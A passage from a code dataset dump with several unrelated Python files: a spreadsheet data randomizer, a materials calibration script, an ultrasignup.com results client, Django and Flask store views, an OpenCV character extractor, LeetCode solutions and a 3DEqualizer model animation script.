data at your own sake.\\n\")\n Active_XLSX.title = input('Please enter your name (Full Name) -> ')\n return\n\n def Intro_DataGet(self):\n print(\"Data Needed is 30 Attempts of Bond Paper Cutting\")\n print(\"Short Bond Paper Dimension is 8.5 x 11 which this concludes the possible range to cut from 2.54cm to 27.94\")\n print(\"Middle Cut is 13.97cm which should give a hint on where to start...\")\n print(\"Please specify range cm to generate...\")\n try:\n self.start_int = float(input(\"Input Starting Range in CM -> \"))\n self.end_int = float(input(\"Input Starting Range in CM -> \"))\n self.attempts = int(input(\"Input Retries, Will Represent as the Nth Column - > \"))\n print(\"Generating Data...\\n\")\n return\n except ValueError:\n self.start_int = 0\n self.end_int = 0\n print(\"Error, you just inputted a value that is not a integer...\")\n print(\"Rerun the program again... Exiting...\")\n exit(0)\n\n def Randomize(self):\n ColumnCount = 0\n #for Column_nth in Active_XLSX.iter_cols(min_col = 1, max_col=self.attempts, min_row=1, max_row=20):\n for Column_nth in range(1, self.attempts + 1):\n ColumnCount += 1\n for Row_nth in range(1, 31):\n self.result = round(uniform(self.start_int, self.end_int), 1)\n Active_XLSX.cell(column = ColumnCount, row = Row_nth, value = (str(self.result) + ' cm'))\n print('Column #',Column_nth,'[ Column Position -> ',ColumnCount,'], Returned Output {}'.format(self.result), 'cm @ ', Row_nth)\n XLSX_Worker.save(Active_XLSX.title + '.xlsx')\n \n def XLSX_CreateWorksheet(self): # unused instance\n XLSX_Worker.create_sheet(Datetime_Create.isoformat())\n\nInstance_1 = Randomize_App(0, 0, 0, 0)\n#Instance_1.XLSX_CreateWorksheet()\nInstance_1.Welcome_Intro()\nInstance_1.Intro_DataGet()\nInstance_1.Randomize()\n\nprint(\"Data Finished... Check\", Active_XLSX.title + '.xlsx On the location of this script... Thank you!')\n","sub_path":"RandomizerEDA.py","file_name":"RandomizerEDA.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"80513253","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 23 14:25:50 2014\n\nThis script performs the MKS calibration given the microstructure function \nand the FIP response, both in frequency space.\n\n@author: nhpnp3\n\"\"\"\n\nimport time\nimport numpy as np\nimport functions_ti_alpha_fip_v1 as rr\nfrom functools import partial\n\n\n## el is the # of elements per side of the cube \nel = 21 \n## select which order terms with nearest neighbors you would like to analyze\norder = 1\n## the number of sample microstructures for calibration.\nns = 200\n## specify the number of local states you are using\nH = 15\n## specify the set designation (string format)\nset_id = 'cal'\n## specify the file to write messages to \nwrt_file = 'calib_%s%s_%s.txt' %(ns,set_id,time.strftime(\"%Y-%m-%d_h%Hm%M\")) \n\n\nM = np.load('M_%s%s.npy' %(ns,set_id))\nE11_fft = np.load('E11_fft_%s%s.npy' %(ns,set_id))\n\nstart = time.time()\n\nspecinfc = np.zeros((el**3,H),dtype = 'complex64')\n\n## here we perform the calibration for the scalar FIP\n\nspecinfc[0,:] = rr.calib(0,M,E11_fft,0,H,el,ns)\n[specinfc[1,:],p] = rr.calib(1,M,E11_fft,0,H,el,ns)\n\n## calib_red is simply calib with some default arguments\ncalib_red = partial(rr.calib,M=M,E11_fft=E11_fft,\n p=p,H=H,el=el,ns=ns)\nspecinfc[2:(el**3),:] = np.asarray(map(calib_red,range(2,el**3)))\n \n\nnp.save('specinfc_%s%s' %(ns,set_id),specinfc)\n\nend = time.time()\ntimeE = np.round((end - start),3)\nmsg = 'Calibration: %s seconds' %timeE\nrr.WP(msg,wrt_file)","sub_path":"fip_collab/strain_mks/matthew_200cal_orig/analysis_elastic_strain_step1/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482272427","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\running\\ultrasignup.py\n# Compiled at: 2020-01-13 13:07:07\n# Size of source mod 2**32: 14482 bytes\n\"\"\"\nultrasignup - access methods for ultrasignup.com\n===================================================\n\"\"\"\nimport argparse, os.path, urllib.request, urllib.parse, urllib.error, unicodedata, logging, json\nlogging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s')\nimport httplib2\nfrom loutilities import timeu\nfrom loutilities import csvu\nfrom loutilities import renderrun as render\nfrom running import accessError, parameterError\nULTRASIGNUP_URL = 'http://ultrasignup.com'\nRESULTS_SEARCH = 'service/events.svc/history/{fname}/{lname}'\nHTTPTIMEOUT = 10\nMPERMILE = 1609.344\ntindate = timeu.asctime('%m/%d/%Y %I:%M:%S %p')\ntoutdate = timeu.asctime('%Y-%m-%d')\n\ndef racenameanddist(eventname):\n \"\"\"\n get race name and distance \n \n :param eventname: eventname from untrasignup.com\n :rtype: racename, distmiles, distkm\n \"\"\"\n racetext = eventname.strip()\n fields = racetext.split('-')\n racename = racetext\n distfield = fields[(-1)].strip()\n dist = 0\n startunits = 0\n for digit in distfield:\n if not digit.isdigit():\n break\n dist *= 10\n dist += int(digit)\n startunits += 1\n\n units = distfield[startunits:].strip()\n if distfield == 'Marathon':\n distmiles = 26.21875\n distkm = distmiles * (MPERMILE / 1000)\n else:\n if distfield == '1/2 Marathon':\n distmiles = 13.109375\n distkm = distmiles * (MPERMILE / 1000)\n else:\n if units == 'K':\n distkm = dist\n distmiles = dist * 1000 / MPERMILE\n else:\n if units == 'Miler':\n if dist == 13:\n distmiles = 13.109375\n else:\n if dist == 26:\n distmiles = 26.21875\n else:\n distmiles = dist\n distkm = distmiles * (MPERMILE / 1000)\n else:\n distmiles = None\n distkm = None\n return (\n racename, distmiles, distkm)\n\n\ndef racenameanddur(eventname):\n \"\"\"\n get race name and duration \n \n :param eventname: eventname from untrasignup.com\n :rtype: racename, duration\n \"\"\"\n racetext = eventname.strip()\n fields = racetext.split('-')\n racename = racetext\n durfield = fields[(-1)].strip()\n dur = 0\n startunits = 0\n for digit in durfield:\n if not digit.isdigit():\n break\n dur *= 10\n dur += int(digit)\n startunits += 1\n\n units = durfield[startunits:]\n if units == 'hrs':\n duration = dur\n else:\n duration = None\n return (racename, duration)\n\n\nclass UltraSignupResult:\n __doc__ = '\\n holds result from ultrasignup.com\\n \\n :param ranking: ultra ranking achieved during race\\n :param oaplace: overall place\\n :param genplace: gender place\\n :param age: age on race day\\n :param gender: gender\\n :param racetime: finishing time h:mm:ss\\n :param racedate: date of race yyyy-mm-dd\\n :param raceloc: location of race\\n :param racename: name of race\\n :param distmiles: distance in miles\\n :param distkm: distance in kilometers\\n '\n us_event_attrs = 'runner_rank,place,gender_place,age,time,eventdate,city,state'.split(',')\n attrs = 'ranking,oaplace,genplace,age,racetime,racedate,racecity,racestate,racename,distmiles,distkm,gender'.split(',')\n\n def __init__(self, ranking=None, oaplace=None, genplace=None, age=None, gender=None, racetime=None, racedate=None, raceloc=None, racename=None, distmiles=None, distkm=None):\n self.ranking = ranking\n self.oaplace = oaplace\n self.genplace = genplace\n self.age = age\n self.gender = gender\n self.racetime = racetime\n self.racedate = racedate\n self.raceloc = raceloc\n self.racename = racename\n self.distmiles = distmiles\n self.distkm = distkm\n\n def __repr__(self):\n reprval = '{}('.format(self.__class__)\n for attr in self.attrs:\n reprval += '{}={},'.format(attr, getattr(self, attr))\n\n reprval = reprval[:-1]\n reprval += ')'\n return reprval\n\n def set(self, attrvals):\n \"\"\"\n set attributes based on list of attr,val pairs\n \n :param attrvals: [(attr,val),...]\n \"\"\"\n for attr, inval in attrvals:\n val = csvu.str2num(inval)\n if attr in ('racedate', ):\n val = toutdate.epoch2asc(tindate.asc2epoch(val))\n setattr(self, attr, val)\n\n\nclass UltraSignup:\n __doc__ = '\\n access methods for ultrasignup.com\\n '\n\n def __init__(self, debug=False):\n \"\"\"\n initialize http \n \"\"\"\n self.http = httplib2.Http(timeout=HTTPTIMEOUT)\n self.log = logging.getLogger('running.ultrasignup')\n self.setdebug(debug)\n self.urlcount = 0\n\n def setdebug(self, debugval):\n \"\"\"\n set debugging attribute for this class\n \n :param debugval: set to True to enable debugging\n \"\"\"\n if not debugval:\n level = logging.INFO\n else:\n level = logging.DEBUG\n self.log.setLevel(level)\n\n def geturlcount(self):\n \"\"\"\n each time a url is retrieved, this counter is bumped\n \n :rtype: integer, number of url's retrieved\n \"\"\"\n return self.urlcount\n\n def listresults(self, fname, lname, **filt):\n \"\"\"\n return results which match an athlete's name\n \n :param fname: first name of athlete\n :param lname: last name of athlete\n :param **filt: keyword parameters to filter with\n :rtype: list of ultrasignup Race dicts\n \"\"\"\n races = []\n data = self._get(RESULTS_SEARCH.format(fname=(urllib.parse.quote(fname)),\n lname=(urllib.parse.quote(lname))))\n content = json.loads(data)\n results = []\n for runner in content:\n usresults = runner['Results']\n gender = runner['Gender']\n for usresult in usresults:\n if usresult['status'] != 1:\n pass\n else:\n vals = []\n for a in UltraSignupResult.us_event_attrs:\n vals.append(usresult[a])\n\n result = UltraSignupResult()\n result.set(list(zip(UltraSignupResult.attrs, vals)))\n result.racename, result.distmiles, result.distkm = racenameanddist(usresult['eventname'])\n if result.distmiles == None:\n result.racename, duration = racenameanddur(usresult['eventname'])\n if duration is None:\n pass\n else:\n result.distmiles = result.racetime\n result.distkm = result.distmiles * (MPERMILE / 1000)\n result.racetime = render.rendertime(duration * 60 * 60.0, 0)\n result.gender = gender\n results.append(result)\n\n def _checkfilter(check):\n for key in filt:\n if not hasattr(check, key) or getattr(check, key) != filt[key]:\n return False\n\n return True\n\n results = list(filter(_checkfilter, results))\n return results\n\n def _get(self, method, **params):\n \"\"\"\n get method for ultrasignup access\n \n :param method: ultrasignup method to call\n :param **params: parameters for the method\n \"\"\"\n body = urllib.parse.urlencode(params)\n url = '{}/{}?{}'.format(ULTRASIGNUP_URL, method, body)\n retries = 10\n while retries > 0:\n retries -= 1\n try:\n self.log.debug(url)\n resp, content = self.http.request(url)\n self.urlcount += 1\n break\n except Exception as e:\n if retries == 0:\n self.log.info('{} requests attempted'.format(self.geturlcount()))\n self.log.error('http request failure, retries exceeded: {0}'.format(e))\n raise\n self.log.warning('http request failure: {0}'.format(e))\n\n if resp.status != 200:\n raise accessError('URL response status = {0}'.format(resp.status))\n return content\n\n\ndef main():\n descr = '\\n unit test for ultrasignup.py\\n '\n parser = argparse.ArgumentParser(description=descr, formatter_class=(argparse.RawDescriptionHelpFormatter), version=('{0} {1}'.format('running', version.__version__)))\n args = parser.parse_args()\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/runtilities-2.0.1-py3.6/ultrasignup.cpython-36.py","file_name":"ultrasignup.cpython-36.py","file_ext":"py","file_size_in_byte":9078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"235256761","text":"from utils.BinaryTree import *\n\n\nclass Solution:\n def constructMaximumBinaryTree(self, nums: 'List[int]') -> 'TreeNode':\n return self.constructTree(nums)\n\n def constructTree(self, ls):\n rootIndex = self.findMaxIndex(ls)\n root = TreeNode(ls[rootIndex])\n if rootIndex > 0:\n root.left = self.constructTree(ls[0: rootIndex])\n if rootIndex < len(ls) - 1:\n root.right = self.constructTree(ls[rootIndex + 1:])\n\n return root\n\n def findMaxIndex(self, ls):\n maxx, index = ls[0], 0\n\n for s in range(len(ls)):\n if ls[s] > maxx:\n maxx, index = ls[s], s\n\n return index\n\n\nTree.printTree(Solution().constructMaximumBinaryTree([3, 2, 1, 6, 0, 5]))\n","sub_path":"vol 6/654 Review.py","file_name":"654 Review.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"616717164","text":"import numpy as np\nimport cv2\nimport time\nimport imutils\nimport os\nim2 = cv2.imread('puzzle2Img.png',0)\n#im[im == 255] = 1\n#im[im == 0] = 255\n#im[im == 1] = 0\n#im2 = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)\n\n#blur = cv2.GaussianBlur(im,(5,5),0)\n#ret3,im2 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\nret,thresh = cv2.threshold(im2,128,255,0)\n#thresh = cv2.adaptiveThreshold(im2,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,11,2)\ncv2.imshow(\"bla\",thresh)\nthresh = cv2.erode(thresh,np.ones((9,9),dtype=np.uint8))\nwat=thresh.copy()\ncv2.imshow(\"thresh\",thresh)\n#print(cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE))\n_,contours, hierarchy = cv2.findContours(wat,cv2.RETR_TREE,cv2.CHAIN_APPROX_TC89_KCOS)\n#contours = []\nim = im2.copy()\nfor i in range(0, len(contours)):\n cnt = contours[i]\n #mask = np.zeros(im2.shape,np.uint8)\n #cv2.drawContours(mask,[cnt],0,255,-1)\n x,y,w,h = cv2.boundingRect(cnt)\n cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),2)\n letter=im2[y:y+h,x:x+w]\n letter = cv2.resize(letter,(32,32))\n cv2.imshow('Features', letter)\n cv2.waitKey(50)\n label = input(\"Label: \").strip().upper()\n if(label == 'SKIP'):\n continue\n if not os.path.exists(\"/Users/Toni/PycharmProjects/Trie/characters/\"+str(label)):\n os.mkdir(\"/Users/Toni/PycharmProjects/Trie/characters/\"+str(label))\n cv2.imwrite(\"/Users/Toni/PycharmProjects/Trie/characters/\"+str(label)+\"/\"+str(i)+'.png', letter)\ncv2.destroyAllWindows()","sub_path":"CharacterExtractor.py","file_name":"CharacterExtractor.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"112113881","text":"from django.core.paginator import Paginator\nfrom django.shortcuts import render\nfrom haystack.views import SearchView\n\nfrom django_store import settings\nfrom merchandise.models import MerchandiseType, Merchandise\nfrom shopping_cart.models import Cart\n\n\ndef index(request):\n \"\"\"\n 展示所有商品的首页\n \"\"\"\n type_list = MerchandiseType.objects.all()\n\n # 查询展示各个分类的最新4条,最热4条\n type0_newest = type_list[0].merchandise_set.order_by('-id')[0:4]\n type0_hottest = type_list[0].merchandise_set.order_by('-browse_count')[0:4]\n type1_newest = type_list[1].merchandise_set.order_by('-id')[0:4]\n type1_hottest = type_list[1].merchandise_set.order_by('-browse_count')[0:4]\n type2_newest = type_list[2].merchandise_set.order_by('-id')[0:4]\n type2_hottest = type_list[2].merchandise_set.order_by('-browse_count')[0:4]\n type3_newest = type_list[3].merchandise_set.order_by('-id')[0:4]\n type3_hottest = type_list[3].merchandise_set.order_by('-browse_count')[0:4]\n type4_newest = type_list[4].merchandise_set.order_by('-id')[0:4]\n type4_hottest = type_list[4].merchandise_set.order_by('-browse_count')[0:4]\n type5_newest = type_list[5].merchandise_set.order_by('-id')[0:4]\n type5_hottest = type_list[5].merchandise_set.order_by('-browse_count')[0:4]\n\n # 如果当前用户已经登录���那么查询该用户购物车内的条目数量\n try:\n user_id = request.session['user_id']\n cart_count = Cart.objects.filter(user_id=int(user_id)).count()\n except: # 如果没有登录,那么显示0条购物车条目数\n cart_count = 0\n\n context = {'MEDIA_URL': settings.MEDIA_URL,\n 'title': '首页', 'guest_cart': 1,\n 'cart_count': cart_count,\n 'type0_newest': type0_newest, 'type0_hottest': type0_hottest,\n 'type1_newest': type1_newest, 'type1_hottest': type1_hottest,\n 'type2_newest': type2_newest, 'type2_hottest': type2_hottest,\n 'type3_newest': type3_newest, 'type3_hottest': type3_hottest,\n 'type4_newest': type4_newest, 'type4_hottest': type4_hottest,\n 'type5_newest': type5_newest, 'type5_hottest': type5_hottest, }\n\n return render(request, 'merchandise/index.html', context)\n\n\ndef list_merchandise_by_type(request, type_id, sorting_criteria, page_num):\n \"\"\"\n 分页展示一个商品分类的所有商品\n \"\"\"\n merchandise_type = MerchandiseType.objects.get(pk=int(type_id))\n\n # 查询该分类下的两个最新商品\n news = merchandise_type.merchandise_set.order_by('-id')[0:2]\n\n if int(sorting_criteria) == 1:\n merchandise_list = Merchandise.objects.filter(\n type_id=int(type_id)).order_by('-id') # 按照id逆序\n elif int(sorting_criteria) == 2:\n merchandise_list = Merchandise.objects.filter(\n type_id=int(type_id)).order_by('-price') # 按照价格逆序\n elif int(sorting_criteria) == 3:\n merchandise_list = Merchandise.objects.filter(\n type_id=int(type_id)).order_by('-browse_count') # 按照浏览量逆序\n else:\n raise Exception('当前传入排序参数有误')\n\n paginator = Paginator(merchandise_list, 10) # 创建分页对象\n page = paginator.page(int(page_num)) # 返回指定页码的一页信息\n\n # 如果当前用户已经登录,那么查询该用户购物车内的条目数量\n try:\n user_id = request.session['user_id']\n cart_count = Cart.objects.filter(user_id=int(user_id)).count()\n except: # 如果没有登录,那么显示0条购物车条目数\n cart_count = 0\n\n context = {'MEDIA_URL': settings.MEDIA_URL,\n 'title': merchandise_type, 'guest_cart': 1,\n 'cart_count': cart_count,\n 'page': page, 'paginator': paginator,\n 'merchandise_type': merchandise_type,\n 'sorting_criteria': sorting_criteria, 'news': news, }\n\n return render(request, 'merchandise/list.html', context)\n\n\ndef detail(request, merchandise_id):\n \"\"\"\n 商品详情页\n \"\"\"\n merchandise = Merchandise.objects.get(pk=merchandise_id)\n merchandise.browse_count += 1 # 当点击进商品详情页的时候就把浏览数加一\n merchandise.save()\n\n # 查询该商品的分类下的两个最新商品,在商品详情页的左下角显示\n newest_recommend = merchandise.type.merchandise_set.order_by('-id')[0:2]\n\n context = {'MEDIA_URL': settings.MEDIA_URL,\n 'title': merchandise.name,\n 'guest_cart': 1,\n 'merchandise': merchandise,\n 'newest_recommend': newest_recommend,\n 'merchandise_id': merchandise_id}\n # 构造响应对象\n response = render(request, 'merchandise/detail.html', context)\n\n # 记录最近浏览的商品,在用户中心展示\n cached_merchandise_id_str = request.COOKIES.get('merchandise_id_str', '')\n cached_merchandise_id = str(merchandise_id)\n if cached_merchandise_id_str != '':\n # 拆分为列表\n cached_merchandise_id_list = cached_merchandise_id_str.split(',')\n if cached_merchandise_id_list.count(cached_merchandise_id) >= 1:\n # 如果商品已经被记录,那么删除已经在缓存队列中的这个商品\n cached_merchandise_id_list.remove(cached_merchandise_id)\n # 在点击商品详情页时,将这个商品加入缓存队列队首\n cached_merchandise_id_list.insert(0, cached_merchandise_id)\n if len(cached_merchandise_id_list) >= 6:\n # 如果最近浏览队列超过6个,那么删除队列队尾\n cached_merchandise_id_list.pop()\n # 拼接为字符串,因为cookie无法存储对象,只能存储字符串\n cached_merchandise_id_str = ','.join(cached_merchandise_id_list)\n else:\n # 如果没有浏览记录,则直接将这个商品添加到缓存队列\n cached_merchandise_id_str = cached_merchandise_id\n\n # 将最近浏览缓存队列存入cookie\n response.set_cookie('merchandise_id_str', cached_merchandise_id_str)\n\n return response\n\n\ndef _cart_count(request):\n \"\"\"\n 查询购物车条目数量\n \"\"\"\n if 'user_id' in request.session:\n return Cart.objects.filter(\n user_id=request.session.get('user_id')).count()\n else:\n return 0\n\n\nclass MerchandiseSearchView(SearchView):\n \"\"\"\n 自定义haystack搜索视图\n \"\"\"\n\n def extra_context(self):\n context = super().extra_context() # 调用父类的extra_context方法获得context\n\n context['title'] = '搜索'\n context['MEDIA_URL'] = settings.MEDIA_URL\n context['guest_cart'] = 1\n context['cart_count'] = _cart_count(self.request)\n\n return context\n","sub_path":"merchandise/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"283465946","text":"class Solution:\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: void Do not return anything, modify nums1 in-place instead.\n \"\"\"\n start_1 = m - 1\n start_2 = n - 1\n insert_point = m + n - 1 \n while start_1 >= 0 and start_2 >= 0:\n if nums1[start_1] >= nums2[start_2]:\n nums1[insert_point] = nums1[start_1] \n start_1 -= 1\n else:\n nums1[insert_point] = nums2[start_2]\n start_2 -= 1\n insert_point -= 1\n\n if start_1 >= 0:\n while start_1 >= 0:\n nums1[insert_point] = nums1[start_1] \n start_1 -= 1\n insert_point -= 1\n\n if start_2 >= 0:\n while start_2 >= 0:\n nums1[insert_point] = nums2[start_2]\n start_2 -= 1\n insert_point -= 1","sub_path":"0-100/88_merge_sorted_array.py","file_name":"88_merge_sorted_array.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"149466737","text":"from decimal import Decimal\n\nfrom flask import request, jsonify, Blueprint\nfrom my_app import app, db\nfrom my_app.catalog.models import Product\n\nfrom my_app import redis\n\ncatalog = Blueprint('catalog', __name__)\n\n\n@catalog.route('/')\n@catalog.route('/home')\ndef home():\n return \"Welcome to the Catalog Home.\"\n\n\n@catalog.route('/product/')\ndef product(key):\n product = Product.objects.get_or_404(key=key)\n product_key = 'product-%s' % product.id\n redis.set(product_key, product.name)\n redis.expire(product_key, 600)\n return 'Product - %s, $%s' % (product.name, product.price)\n\n\n@catalog.route('/products')\ndef products():\n products = Product.objects.all()\n res = {}\n for product in products:\n res[product.key] = {\n 'name': product.name,\n 'price': str(product.price)\n }\n return jsonify(res)\n\n\n@catalog.route('/product-create', methods=['POST', ])\ndef create_product():\n name = request.form.get('name')\n key = request.form.get('key')\n price = request.form.get('price')\n product = Product(\n name=name,\n key=key,\n price=Decimal(price)\n )\n product.save()\n return 'Product created.'\n\n\n@catalog.route('/recent-products')\ndef recent_products():\n keys_alive = redis.keys('product-*')\n products = [redis.get(k) for k in keys_alive]\n return jsonify({'products': products})\n\n\n\n\n\n\n\n\n\n\n","sub_path":"my_app/catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"18855050","text":"# 3DE4.script.name: 3DModel Animation Curve Editor...\r\n# 3DE4.script.version: v1.0b3\r\n# 3DE4.script.gui: Lineup Controls::Edit\r\n# 3DE4.script.gui: Orientation Controls::Edit\r\n# 3DE4.script.gui.button: Lineup Controls::3DModel Anim, align-bottom-left, 80,20\r\n# 3DE4.script.gui.button: Orientation Controls::3DModel Anim, align-bottom-left, 70,20\r\n# 3DE4.script.comment:\tThis script allows user to animate 3DModels inside of 3DE.\r\n# 3DE4.script.gui.config_menus: true\r\n# Patcha Saheb(patchasaheb@gmail.com)\r\n# 10 Oct 2017.\r\n\r\nfrom vl_sdv import*\r\nimport math\r\n\r\ntde4.clearConsole()\r\npg = tde4.getCurrentPGroup()\r\npg_type = tde4.getPGroupType(pg)\r\ncam = tde4.getCurrentCamera()\r\nframe = tde4.getCurrentFrame(cam)\r\nframes = tde4.getCameraNoFrames(cam)\r\nframe_offset = tde4.getCameraFrameOffset(cam)\r\nmlist = tde4.get3DModelList(pg,1)\r\nwindow_title = \"Patcha 3DModel Animation Curve Editor v1.0b3\"\r\n\r\ndef Realtime_Update(req):\r\n\tpg = tde4.getCurrentPGroup()\r\n\tcam = tde4.getCurrentCamera()\r\n\tframe = tde4.getCurrentFrame(cam)\r\n\tmlist = tde4.get3DModelList(pg,0)\r\n\r\n\t#cursor update...\r\n\tframe = tde4.getCurrentFrame(tde4.getCurrentCamera())\r\n\ttde4.setCurveAreaWidgetCursorPosition(anim_req,\"curves_area\",frame,1)\r\n\r\n\tif tde4.getWidgetValue(anim_req,\"live_update_toggle\") == 1:\r\n\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\tfor model in mlist:\r\n\t\t\tm_name = tde4.get3DModelName(pg,model)\r\n\t\t\tfor item in range(0,no_of_items):\r\n\t\t\t\tlabel = tde4.getListWidgetItemLabel(anim_req,\"model_list\",item)\r\n\t\t\t\tif m_name == label:\r\n\t\t\t\t\t#position curves live update to viewport...\r\n\t\t\t\t\tpos_x_curve_y = tde4.evaluateCurve(pos_x_curves_list[item],frame)\t\r\n\t\t\t\t\tpos_y_curve_y = tde4.evaluateCurve(pos_y_curves_list[item],frame)\t\r\n\t\t\t\t\tpos_z_curve_y = tde4.evaluateCurve(pos_z_curves_list[item],frame)\r\n\t\t\t\t\ttde4.set3DModelPosition3D(pg,model,[pos_x_curve_y,pos_y_curve_y,pos_z_curve_y])\r\n\r\n\t\t\t\t\t#rotation and scale curves live update to viewport...\r\n\t\t\t\t\trot_x_curve_y = tde4.evaluateCurve(rot_x_curves_list[item],frame) * math.pi /180.0\t\r\n\t\t\t\t\trot_y_curve_y = tde4.evaluateCurve(rot_y_curves_list[item],frame) * math.pi /180.0\t\r\n\t\t\t\t\trot_z_curve_y = tde4.evaluateCurve(rot_z_curves_list[item],frame) * math.pi /180.0\r\n\t\t\t\t\trot_Matrix = mat3d(rot3d(rot_x_curve_y,rot_y_curve_y,rot_z_curve_y,VL_APPLY_ZXY))\r\n\t\t\t\t\tm = mat3d(tde4.get3DModelRotationScale3D(pg,model))\r\n\t\t\t\t\tuniform_scale_curve_y = tde4.evaluateCurve(scale_curves_list[item],frame)\r\n\t\t\t\t\tscale_Matrix = mat3d(uniform_scale_curve_y,0.0,0.0,0.0,uniform_scale_curve_y,0.0,0.0,0.0,uniform_scale_curve_y)\r\n\t\t\t\t\tf = rot_Matrix * scale_Matrix\t\t\t\t\t\r\n\t\t\t\t\ttde4.set3DModelRotationScale3D(pg,model,f.list())\r\n\r\n\t\t\t\t\t#visibility live update to viewport...\r\n\t\t\t\t\tvisibility_curve_y = tde4.evaluateCurve(visibility_curves_list[item],frame)\r\n\t\t\t\t\tif visibility_curve_y == 0:\r\n\t\t\t\t\t\ttde4.set3DModelVisibleFlag(pg,model,0)\r\n\t\t\t\t\tif visibility_curve_y == 1:\r\n\t\t\t\t\t\ttde4.set3DModelVisibleFlag(pg,model,1)\r\n\r\n\t\t\t\t\t#alpha live update to viewport...\r\n\t\t\t\t\talpha_curve_y = tde4.evaluateCurve(alpha_curves_list[item],frame)\r\n\t\t\t\t\tm_color = tde4.get3DModelColor(pg,model)\r\n\t\t\t\t\ttde4.set3DModelColor(pg,model,m_color[0],m_color[1],m_color[2],alpha_curve_y)\r\n\t\t\t\t\ttde4.updateGUI(1)\r\n\t\t\t\t\t\r\n\r\ndef Create_Keys(pg,cam,mlist,frame):\r\n\tpg = tde4.getCurrentPGroup()\r\n\tcam = tde4.getCurrentCamera()\r\n\tframe = tde4.getCurrentFrame(cam)\r\n\tframes = tde4.getCameraNoFrames(tde4.getCurrentCamera())\r\n\tmlist = tde4.get3DModelList(pg,0)\r\n\r\n\t#make sure only one item must be selected...\r\n\tcount = 0\r\n\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\tfor item in range(0,no_of_items):\r\n\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\tif sel_flag == 1:\r\n\t\t\tcount = count + 1\r\n\r\n\t#create keys...\t\t\r\n\tif count == 1:\r\n\t\tfor item in range(0,no_of_items):\r\n\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\tif sel_flag == 1:\r\n\t\t\t\tlabel = tde4.getListWidgetItemLabel(anim_req,\"model_list\",item)\r\n\t\t\t\tbreak\r\n\t\tfor model in mlist:\r\n\t\t\tm_name = tde4.get3DModelName(pg,model)\r\n\t\t\tif m_name == label:\r\n\t\t\t\tbreak\r\n\r\n\t\t#create position curves keys...\r\n\t\tpos3d = vec3d(tde4.get3DModelPosition3D(pg,model,cam,frame))\r\n\t\tkey = tde4.createCurveKey(pos_x_curves_list[item],[frame,float(pos3d[0])])\r\n\t\ttde4.setCurveKeyFixedXFlag(pos_x_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(pos_x_curves_list[item],key,\"LINEAR\")\r\n\t\tpos3d = vec3d(tde4.get3DModelPosition3D(pg,model,cam,frame))\r\n\t\tkey = tde4.createCurveKey(pos_y_curves_list[item],[frame,float(pos3d[1])])\r\n\t\ttde4.setCurveKeyFixedXFlag(pos_y_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(pos_y_curves_list[item],key,\"LINEAR\")\r\n\t\tpos3d = vec3d(tde4.get3DModelPosition3D(pg,model,cam,frame))\r\n\t\tkey = tde4.createCurveKey(pos_z_curves_list[item],[frame,float(pos3d[2])])\r\n\t\ttde4.setCurveKeyFixedXFlag(pos_z_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(pos_z_curves_list[item],key,\"LINEAR\")\r\n\r\n\t\t#create rotation curves keys...\r\n\t\tr3d = mat3d(tde4.get3DModelRotationScale3D(pg,model))\r\n\t\ts0 = vec3d(r3d[0][0],r3d[1][0],r3d[2][0]).norm2()\r\n\t\ts1 = vec3d(r3d[0][1],r3d[1][1],r3d[2][1]).norm2()\r\n\t\ts2 = vec3d(r3d[0][2],r3d[1][2],r3d[2][2]).norm2()\r\n\t\tm_rot = r3d * mat3d(1.0/s0,0.0,0.0,0.0,1.0/s1,0.0,0.0,0.0,1.0/s2)\r\n\t\tphi_x,phi_y,phi_z = rot3d(m_rot).angles(VL_APPLY_ZXY)\r\n\t\tphi_x = phi_x * 180.0 / math.pi\r\n\t\tphi_y = phi_y * 180.0 / math.pi\r\n\t\tphi_z = phi_z * 180.0 / math.pi\r\n\t\tkey = 